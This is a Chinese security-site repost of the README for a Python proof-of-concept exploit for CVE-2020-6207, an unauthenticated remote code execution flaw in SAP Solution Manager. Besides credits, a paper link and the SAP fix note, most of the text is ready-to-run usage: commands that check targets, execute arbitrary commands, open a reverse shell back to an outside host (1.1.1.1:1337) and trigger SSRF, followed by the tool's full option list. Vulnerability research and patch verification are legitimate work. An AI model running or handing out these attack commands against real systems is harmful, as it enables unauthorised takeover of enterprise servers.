CVE-2020-6207的PoC(SAP解决方案管理器中缺少身份验证检查)

admin 2021年5月13日01:37:02评论73 views字数 2317阅读7分43秒阅读模式

为的PoC CVE-2020-6207 (SAP解决方案管理缺少验证检查)
该脚本允许检查和漏洞缺少SAP EEM servlet身份验证检查(tc~smd~agent~application~eem铅在连接到SAP解决方案管理器SAP SMDAgents RCE)
原件的发现:

  • 巴勃罗·阿图索(Pablo Artuso)

  • 伊万(Yvan'iggy)G

论文:一次未经身份验证的扎根之旅:为公司的企业软件服务器提供服务

https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf

解决方案:SAP笔记2890213

在Twitter上关注我:chipik

该项目仅出于教育目的而创建,不能用于违法或个人利益。
本项目的作者对本项目的材料可能造成的任何伤害不承担任何责任

细节

您将在流程文章中找到漏洞详细信息

如何使用

Just point SAP Solution Manager hostnmae/ip.

检查一下

➜ python sol-rce.py -H 172.16.30.43 -P 50000 -cVulnerable! [CVE-2020-6207] - http://172.16.30.43:50000

触发RCE

python sol-rce.py -H 172.16.30.43 -P 50000 --rce calc.exe

CVE-2020-6207的PoC(SAP解决方案管理器中缺少身份验证检查)

取得BackConnect

python sol-rce.py -H 172.16.30.43 -P 50000 --back 1.1.1.1:1337

SSRF

➜ python sol-rce.py -H 172.16.30.43 -P 50000 --ssrf http://1.1.1.1/chpk

其他

还有其他选项:

➜ python sol-rce.py -h
usage: sol-rce.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-d VICTIM] [--ssrf SSRF] [--rce RCE] [--back BACK] [--setup SETUP] [--list] [--clear] [-t TIMEOUT] [-v]
PoC for CVE-2020-6207, (Missing Authentication Check in SAP Solution Manager)This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution ManagerOriginal finding:- Pablo Artuso. https://twitter.com/lmkalg- Yvan 'iggy' G https://twitter.com/_1ggy
Paper: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdfSolution: https://launchpad.support.sap.com/#/notes/2890213
twitter: https://twitter.com/_chipik
optional arguments: -h, --help show this help message and exit -H HOST, --host HOST SAP Solution Manager host(default: 127.0.0.1) -P PORT, --port PORT SAP Solution Manager web port (default: tcp/50000) -p PROXY, --proxy PROXY Use proxy (ex: 127.0.0.1:8080) -s, --ssl enable SSL -c, --check just detect vulnerability -d VICTIM, --victim VICTIM DA serverName --ssrf SSRF exploit SSRF. Point http address here. (example:http://1.1.1.1/chpk) --rce RCE exploit RCE --back BACK get backConnect from DA. (ex: 1.1.1.1:1337) --setup SETUP setup a random serverName to the DA with the given hostName and instanceName. (example: javaup.mshome.net,SMDA97) --list Get a list of existing DA servers --clear stop and delete all PoCScript<rnd> scripts from DA servers -t TIMEOUT, --timeout TIMEOUT HTTP connection timeout in second (default: 10) -v, --verbose verbose mode

点击阅读原文跳转

CVE-2020-6207的PoC(SAP解决方案管理器中缺少身份验证检查)

本文始发于微信公众号(Ots安全):CVE-2020-6207的PoC(SAP解决方案管理器中缺少身份验证检查)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月13日01:37:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-6207的PoC(SAP解决方案管理器中缺少身份验证检查)https://cn-sec.com/archives/255599.html

发表评论

匿名网友 填写信息